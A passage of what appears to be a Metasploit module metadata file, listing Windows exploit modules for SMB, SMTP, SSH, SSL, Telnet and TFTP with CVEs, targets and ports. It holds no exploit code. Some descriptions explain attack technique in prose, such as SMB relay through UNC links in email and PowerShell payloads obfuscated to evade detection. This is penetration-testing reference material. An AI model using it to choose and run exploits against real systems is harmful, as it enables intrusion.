"URL-https://github.com/worawit/MS17-010",
"URL-https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf",
"URL-https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"PowerShell",
"Native upload",
"MOF upload"
],
"mod_time": "2019-01-16 11:23:21 +0000",
"path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
"is_install_path": true,
"ref_name": "windows/smb/ms17_010_psexec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"AKA": [
"ETERNALSYNERGY",
"ETERNALROMANCE",
"ETERNALCHAMPION",
"ETERNALBLUE"
]
}
},
"exploit_windows/smb/netidentity_xtierrpcpipe": {
"name": "Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow",
"full_name": "exploit/windows/smb/netidentity_xtierrpcpipe",
"rank": 500,
"disclosure_date": "2009-04-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Ruben Santamarta"
],
"description": "This module exploits a stack buffer overflow in Novell's NetIdentity Agent. When sending\n a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be\n able to execute arbitrary code. The success of this module is much greater once the\n service has been restarted.",
"references": [
"CVE-2009-1350",
"OSVDB-53351",
"BID-34400",
"URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=62&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Windows 2000 / Windows XP / Windows 2003"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb",
"is_install_path": true,
"ref_name": "windows/smb/netidentity_xtierrpcpipe",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/smb/psexec": {
"name": "Microsoft Windows Authenticated User Code Execution",
"full_name": "exploit/windows/smb/psexec",
"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Royce Davis <rdavis@accuvant.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module uses a valid administrator username and password (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" utility provided by SysInternals. This module is now able\n to clean up after itself. The service created by this tool uses a randomly\n chosen name and description.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
"URL-http://sourceforge.net/projects/smbexec/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"PowerShell",
"Native upload",
"MOF upload"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/smb/psexec.rb",
"is_install_path": true,
"ref_name": "windows/smb/psexec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/psexec_psh": {
"name": "Microsoft Windows Authenticated Powershell Command Execution",
"full_name": "exploit/windows/smb/psexec_psh",
"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Royce @R3dy__ Davis <rdavis@accuvant.com>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "This module uses a valid administrator username and password to execute a powershell\n payload using a similar technique to the \"psexec\" utility provided by SysInternals. The\n payload is encoded in base64 and executed from the commandline using the -encodedcommand\n flag. Using this method, the payload is never written to disk, and given that each payload\n is unique, is less prone to signature based detection. A persist option is provided to\n execute the payload in a while loop in order to maintain a form of persistence. In the\n event of a sandbox observing PSH execution, a delay and other obfuscation may be added to\n avoid detection. In order to avoid interactive process notifications for the current user,\n the psh payload has been reduced in size and wrapped in a powershell invocation which hides\n the window entirely.",
"references": [
"CVE-1999-0504",
"OSVDB-3106",
"URL-https://www.optiv.com/blog/owning-computers-without-shell-access",
"URL-http://sourceforge.net/projects/smbexec/",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-30 12:37:06 +0000",
"path": "/modules/exploits/windows/smb/psexec_psh.rb",
"is_install_path": true,
"ref_name": "windows/smb/psexec_psh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/smb_delivery": {
"name": "SMB Delivery",
"full_name": "exploit/windows/smb/smb_delivery",
"rank": 600,
"disclosure_date": "2016-07-26",
"type": "exploit",
"author": [
"Andrew Smith",
"Russel Van Tuyl"
],
"description": "This module serves payloads via an SMB server and provides commands to retrieve\n and execute the generated payloads. Currently supports DLLs and Powershell.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/3074"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"DLL",
"PSH"
],
"mod_time": "2019-03-29 18:14:56 +0000",
"path": "/modules/exploits/windows/smb/smb_delivery.rb",
"is_install_path": true,
"ref_name": "windows/smb/smb_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/smb_relay": {
"name": "MS08-068 Microsoft Windows SMB Relay Code Execution",
"full_name": "exploit/windows/smb/smb_relay",
"rank": 600,
"disclosure_date": "2001-03-31",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module will relay SMB authentication requests to another\n host, gaining access to an authenticated SMB session if successful.\n If the connecting user is an administrator and network logins are\n allowed to the target machine, this module will execute an arbitrary\n payload. To exploit this, the target system must try to authenticate\n to this module. The easiest way to force an SMB authentication attempt\n is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or\n email message. When the victim views the web page or email, their\n system will automatically connect to the server specified in the UNC\n share (the IP address of the system running this module) and attempt\n to authenticate. Unfortunately, this\n module is not able to clean up after itself. The service and payload\n file listed in the output will need to be manually removed after access\n has been gained. The service created by this tool uses a randomly chosen\n name and description, so the services list can become cluttered after\n repeated exploitation.\n\n The SMB authentication relay attack was first reported by Sir Dystic on\n March 31st, 2001 at @lanta.con in Atlanta, Georgia.\n\n On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin\n includes a patch which prevents the relaying of challenge keys back to\n the host which issued them, preventing this exploit from working in\n the default configuration. It is still possible to set the SMBHOST\n parameter to a third-party host that the victim is authorized to access,\n but the \"reflection\" attack has been effectively broken.",
"references": [
"CVE-2008-4037",
"OSVDB-49736",
"MSB-MS08-068",
"URL-http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx",
"URL-http://en.wikipedia.org/wiki/SMBRelay",
"URL-http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/smb_relay.rb",
"is_install_path": true,
"ref_name": "windows/smb/smb_relay",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/timbuktu_plughntcommand_bof": {
"name": "Timbuktu PlughNTCommand Named Pipe Buffer Overflow",
"full_name": "exploit/windows/smb/timbuktu_plughntcommand_bof",
"rank": 500,
"disclosure_date": "2009-06-25",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6\n in a pretty novel way.\n\n This exploit requires two connections. The first connection is used to leak stack data\n using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying\n a large value for this argument it is possible to cause Timbuktu to reply to the initial\n request with leaked stack data. Using this data allows for reliable exploitation of the\n buffer overflow vulnerability.\n\n Props to Infamous41d for helping in finding this exploitation path.\n\n The second connection utilizes the data from the data leak to accurately exploit\n the stack based buffer overflow vulnerability.\n\n TODO:\n hdm suggested using meterpreter's migration capability and restarting the process\n for multishot exploitation.",
"references": [
"CVE-2009-1394",
"OSVDB-55436",
"BID-35496",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=809"
],
"platform": "Windows",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb",
"is_install_path": true,
"ref_name": "windows/smb/timbuktu_plughntcommand_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smb/webexec": {
"name": "WebExec Authenticated User Code Execution",
"full_name": "exploit/windows/smb/webexec",
"rank": 0,
"disclosure_date": "2018-10-24",
"type": "exploit",
"author": [
"Ron <ron@skullsecurity.net>"
],
"description": "This module uses a valid username and password of any level (or\n password hash) to execute an arbitrary payload. This module is similar\n to the \"psexec\" module, except allows any non-guest account by default.",
"references": [
"URL-https://webexec.org",
"CVE-2018-15442"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic",
"Native upload"
],
"mod_time": "2018-10-24 09:46:00 +0000",
"path": "/modules/exploits/windows/smb/webexec.rb",
"is_install_path": true,
"ref_name": "windows/smb/webexec",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/mailcarrier_smtp_ehlo": {
"name": "TABS MailCarrier v2.51 SMTP EHLO Overflow",
"full_name": "exploit/windows/smtp/mailcarrier_smtp_ehlo",
"rank": 400,
"disclosure_date": "2004-10-26",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits the MailCarrier v2.51 suite SMTP service.\n The stack is overwritten when sending an overly long EHLO command.",
"references": [
"CVE-2004-1638",
"OSVDB-11174",
"BID-11535",
"EDB-598"
],
"platform": "Windows",
"arch": "x86",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0 - XP SP1 - EN/FR/GR",
"Windows XP SP2 - EN"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb",
"is_install_path": true,
"ref_name": "windows/smtp/mailcarrier_smtp_ehlo",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/mercury_cram_md5": {
"name": "Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow",
"full_name": "exploit/windows/smtp/mercury_cram_md5",
"rank": 500,
"disclosure_date": "2007-08-18",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.\n By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker\n may be able to execute arbitrary code.",
"references": [
"CVE-2007-4440",
"OSVDB-39669",
"BID-25357"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Mercury Mail Transport System 4.51"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/mercury_cram_md5.rb",
"is_install_path": true,
"ref_name": "windows/smtp/mercury_cram_md5",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/ms03_046_exchange2000_xexch50": {
"name": "MS03-046 Exchange 2000 XEXCH50 Heap Overflow",
"full_name": "exploit/windows/smtp/ms03_046_exchange2000_xexch50",
"rank": 400,
"disclosure_date": "2003-10-15",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This is an exploit for the Exchange 2000 heap overflow. Due\n to the nature of the vulnerability, this exploit is not very\n reliable. This module has been tested against Exchange 2000\n SP0 and SP3 running a Windows 2000 system patched to SP4. It\n normally takes between one and 100 connection attempts to\n successfully obtain a shell. This exploit is *very* unreliable.",
"references": [
"CVE-2003-0714",
"BID-8838",
"OSVDB-2674",
"MSB-MS03-046",
"EDB-113"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Exchange 2000"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb",
"is_install_path": true,
"ref_name": "windows/smtp/ms03_046_exchange2000_xexch50",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/njstar_smtp_bof": {
"name": "NJStar Communicator 3.00 MiniSMTP Buffer Overflow",
"full_name": "exploit/windows/smtp/njstar_smtp_bof",
"rank": 300,
"disclosure_date": "2011-10-31",
"type": "exploit",
"author": [
"Dillon Beresford"
],
"description": "This module exploits a stack buffer overflow vulnerability in NJStar Communicator\n Version 3.00 MiniSMTP server. The MiniSMTP application can be seen in multiple\n NJStar products, and will continue to run in the background even if the\n software is already shutdown. According to the vendor's testimonials,\n NJStar software is also used by well known companies such as Siemens, NEC,\n Google, Yahoo, eBay; government agencies such as the FBI, Department of\n Justice (HK); as well as a long list of universities such as Yale, Harvard,\n University of Tokyo, etc.",
"references": [
"OSVDB-76728",
"CVE-2011-4040",
"URL-http://www.njstar.com/cms/njstar-communicator",
"EDB-18057"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/SP3",
"Windows Server 2003 SP0",
"Windows Server 2003 SP1/SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/njstar_smtp_bof.rb",
"is_install_path": true,
"ref_name": "windows/smtp/njstar_smtp_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/sysgauge_client_bof": {
"name": "SysGauge SMTP Validation Buffer Overflow",
"full_name": "exploit/windows/smtp/sysgauge_client_bof",
"rank": 300,
"disclosure_date": "2017-02-28",
"type": "exploit",
"author": [
"Chris Higgins",
"Peter Baris"
],
"description": "This module will setup an SMTP server expecting a connection from SysGauge 1.5.18\n via its SMTP server validation. The module sends a malicious response along in the\n 220 service ready response and exploits the client, resulting in an unprivileged shell.",
"references": [
"CVE-2017-6416",
"EDB-41479"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/smtp/sysgauge_client_bof.rb",
"is_install_path": true,
"ref_name": "windows/smtp/sysgauge_client_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/wmailserver": {
"name": "SoftiaCom WMailserver 1.0 Buffer Overflow",
"full_name": "exploit/windows/smtp/wmailserver",
"rank": 200,
"disclosure_date": "2005-07-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in SoftiaCom WMailserver 1.0\n (SMTP) via a SEH frame overwrite.",
"references": [
"CVE-2005-2287",
"OSVDB-17883",
"BID-14213"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/wmailserver.rb",
"is_install_path": true,
"ref_name": "windows/smtp/wmailserver",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/smtp/ypops_overflow1": {
"name": "YPOPS 0.6 Buffer Overflow",
"full_name": "exploit/windows/smtp/ypops_overflow1",
"rank": 200,
"disclosure_date": "2004-09-27",
"type": "exploit",
"author": [
"acaro <acaro@jervus.it>"
],
"description": "This module exploits a stack buffer overflow in the YPOPS POP3\n service.\n\n This is a classic stack buffer overflow for YPOPS version 0.6.\n Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to\n jmp ebx opcode in ws_32.dll",
"references": [
"CVE-2004-1558",
"OSVDB-10367",
"BID-11256",
"URL-http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic",
"Windows 2000 SP0 Italian",
"Windows 2000 Advanced Server Italian SP4",
"Windows 2000 Advanced Server SP3 English",
"Windows 2000 SP0 English",
"Windows 2000 SP1 English",
"Windows 2000 SP2 English",
"Windows 2000 SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English",
"Windows 2003 SP0 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/smtp/ypops_overflow1.rb",
"is_install_path": true,
"ref_name": "windows/smtp/ypops_overflow1",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/freeftpd_key_exchange": {
"name": "FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",
"full_name": "exploit/windows/ssh/freeftpd_key_exchange",
"rank": 200,
"disclosure_date": "2006-05-12",
"type": "exploit",
"author": [
"riaf <riaf@mysec.org>"
],
"description": "This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.\n This module is based on MC's freesshd_key_exchange exploit.",
"references": [
"CVE-2006-2407",
"OSVDB-25569",
"BID-17958"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP0-SP4 English",
"Windows 2000 SP0-SP4 German",
"Windows XP SP0-SP1 English",
"Windows XP SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/freeftpd_key_exchange.rb",
"is_install_path": true,
"ref_name": "windows/ssh/freeftpd_key_exchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/freesshd_authbypass": {
"name": "Freesshd Authentication Bypass",
"full_name": "exploit/windows/ssh/freesshd_authbypass",
"rank": 600,
"disclosure_date": "2010-08-11",
"type": "exploit",
"author": [
"Aris",
"kcope",
"Daniele Martini <cyrax@pkcrew.org>",
"Imran E. Dawoodjee <imrandawoodjee <Imran E. Dawoodjee <imrandawoodjee@infosec@gmail.com> (minor improvements)>"
],
"description": "This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass\n authentication. You just need the username (which defaults to root). The exploit\n has been tested with both password and public key authentication.",
"references": [
"CVE-2012-6066",
"OSVDB-88006",
"BID-56785",
"URL-http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html",
"URL-https://seclists.org/fulldisclosure/2010/Aug/132"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"PowerShell",
"CmdStager upload"
],
"mod_time": "2018-11-18 03:29:17 +0000",
"path": "/modules/exploits/windows/ssh/freesshd_authbypass.rb",
"is_install_path": true,
"ref_name": "windows/ssh/freesshd_authbypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/freesshd_key_exchange": {
"name": "FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",
"full_name": "exploit/windows/ssh/freesshd_key_exchange",
"rank": 200,
"disclosure_date": "2006-05-12",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.\n This flaw is due to a buffer overflow error when handling a specially\n crafted key exchange algorithm string received from an SSH client.",
"references": [
"CVE-2006-2407",
"OSVDB-25463",
"BID-17958"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English",
"Windows XP Pro SP0 English",
"Windows XP Pro SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/freesshd_key_exchange.rb",
"is_install_path": true,
"ref_name": "windows/ssh/freesshd_key_exchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/putty_msg_debug": {
"name": "PuTTY Buffer Overflow",
"full_name": "exploit/windows/ssh/putty_msg_debug",
"rank": 300,
"disclosure_date": "2002-12-16",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the PuTTY SSH client that is\n triggered through a validation error in SSH.c. This vulnerability\n affects versions 0.53 and earlier.",
"references": [
"CVE-2002-1359",
"OSVDB-8044",
"URL-http://www.rapid7.com/advisories/R7-0009.html",
"BID-6407"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4 English",
"Windows XP SP2 English",
"Windows 2003 SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/putty_msg_debug.rb",
"is_install_path": true,
"ref_name": "windows/ssh/putty_msg_debug",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/securecrt_ssh1": {
"name": "SecureCRT SSH1 Buffer Overflow",
"full_name": "exploit/windows/ssh/securecrt_ssh1",
"rank": 200,
"disclosure_date": "2002-07-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in SecureCRT <= 4.0\n Beta 2. By sending a vulnerable client an overly long\n SSH1 protocol identifier string, it is possible to execute\n arbitrary code.\n\n This module has only been tested on SecureCRT 3.4.4.",
"references": [
"CVE-2002-1059",
"OSVDB-4991",
"BID-5287"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SecureCRT.exe (3.4.4)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssh/securecrt_ssh1.rb",
"is_install_path": true,
"ref_name": "windows/ssh/securecrt_ssh1",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssh/sysax_ssh_username": {
"name": "Sysax 5.53 SSH Username Buffer Overflow",
"full_name": "exploit/windows/ssh/sysax_ssh_username",
"rank": 300,
"disclosure_date": "2012-02-27",
"type": "exploit",
"author": [
"Craig Freyman",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Sysax's SSH service. By\n supplying a long username, the SSH server will copy that data on the stack\n without proper bounds checking, therefore allowing remote code execution\n under the context of the user. Please note that previous versions\n (before 5.53) are also affected by this bug.",
"references": [
"OSVDB-79689",
"URL-http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html",
"EDB-18535"
],
"platform": "Windows",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sysax 5.53 on Win XP SP3 / Win2k3 SP0",
"Sysax 5.53 on Win2K3 SP1/SP2"
],
"mod_time": "2018-08-15 14:54:41 +0000",
"path": "/modules/exploits/windows/ssh/sysax_ssh_username.rb",
"is_install_path": true,
"ref_name": "windows/ssh/sysax_ssh_username",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/ssl/ms04_011_pct": {
"name": "MS04-011 Microsoft Private Communications Transport Overflow",
"full_name": "exploit/windows/ssl/ms04_011_pct",
"rank": 200,
"disclosure_date": "2004-04-13",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in the Microsoft\n Windows SSL PCT protocol stack. This code is based on Johnny\n Cyberpunk's THC release and has been tested against Windows\n 2000 and Windows XP. To use this module, specify the remote\n port of any SSL service, or the port and protocol of an\n application that uses SSL. The only application protocol\n supported at this time is SMTP. You only have one chance to\n select the correct target, if you are attacking IIS, you may\n want to try one of the other exploits first (WebDAV). If\n WebDAV does not work, this more than likely means that this\n is either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n 5.1). Using the wrong target may not result in an immediate\n crash of the remote system.",
"references": [
"CVE-2003-0719",
"OSVDB-5250",
"BID-10116",
"MSB-MS04-011"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 SP4",
"Windows 2000 SP3",
"Windows 2000 SP2",
"Windows 2000 SP1",
"Windows 2000 SP0",
"Windows XP SP0",
"Windows XP SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/ssl/ms04_011_pct.rb",
"is_install_path": true,
"ref_name": "windows/ssl/ms04_011_pct",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/telnet/gamsoft_telsrv_username": {
"name": "GAMSoft TelSrv 1.5 Username Buffer Overflow",
"full_name": "exploit/windows/telnet/gamsoft_telsrv_username",
"rank": 200,
"disclosure_date": "2000-07-17",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n Other versions may also be affected. The service terminates after exploitation,\n so you only get one chance!",
"references": [
"CVE-2000-0665",
"OSVDB-373",
"BID-1478",
"URL-http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip"
],
"platform": "Windows",
"arch": "x86",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP0/4 English REMOTE",
"Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)",
"Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb",
"is_install_path": true,
"ref_name": "windows/telnet/gamsoft_telsrv_username",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/telnet/goodtech_telnet": {
"name": "GoodTech Telnet Server Buffer Overflow",
"full_name": "exploit/windows/telnet/goodtech_telnet",
"rank": 200,
"disclosure_date": "2005-03-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n versions prior to 5.0.7. By sending an overly long string, an attacker can\n overwrite the buffer and control program execution.",
"references": [
"CVE-2005-0768",
"OSVDB-14806",
"BID-12815"
],
"platform": "Windows",
"arch": "",
"rport": 2380,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English All",
"Windows XP Pro SP0/SP1 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/telnet/goodtech_telnet.rb",
"is_install_path": true,
"ref_name": "windows/telnet/goodtech_telnet",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/attftp_long_filename": {
"name": "Allied Telesyn TFTP Server 1.9 Long Filename Overflow",
"full_name": "exploit/windows/tftp/attftp_long_filename",
"rank": 200,
"disclosure_date": "2006-11-27",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a\n request (get/write) for an overly long file name.",
"references": [
"CVE-2006-6184",
"OSVDB-11350",
"BID-21320",
"EDB-2887"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows NT SP4 English",
"Windows 2000 SP0 English",
"Windows 2000 SP1 English",
"Windows 2000 SP2 English",
"Windows 2000 SP3 English",
"Windows 2000 SP4 English",
"Windows XP SP0/1 English",
"Windows XP SP2 English",
"Windows XP SP3 English",
"Windows Server 2003",
"Windows Server 2003 SP2"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/tftp/attftp_long_filename.rb",
"is_install_path": true,
"ref_name": "windows/tftp/attftp_long_filename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/distinct_tftp_traversal": {
"name": "Distinct TFTP 3.10 Writable Directory Traversal Execution",
"full_name": "exploit/windows/tftp/distinct_tftp_traversal",
"rank": 600,
"disclosure_date": "2012-04-08",
"type": "exploit",
"author": [
"modpr0be",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Distinct TFTP server. The\n software contains a directory traversal vulnerability that allows a remote\n attacker to write arbitrary files to the file system, which results in\n code execution under the context of 'SYSTEM'.",
"references": [
"OSVDB-80984",
"EDB-18718",
"URL-http://www.spentera.com/advisories/2012/SPN-01-2012.pdf",
"CVE-2012-6664"
],
"platform": "Windows",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Distinct TFTP 3.10 on Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/tftp/distinct_tftp_traversal.rb",
"is_install_path": true,
"ref_name": "windows/tftp/distinct_tftp_traversal",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/tftp/dlink_long_filename": {
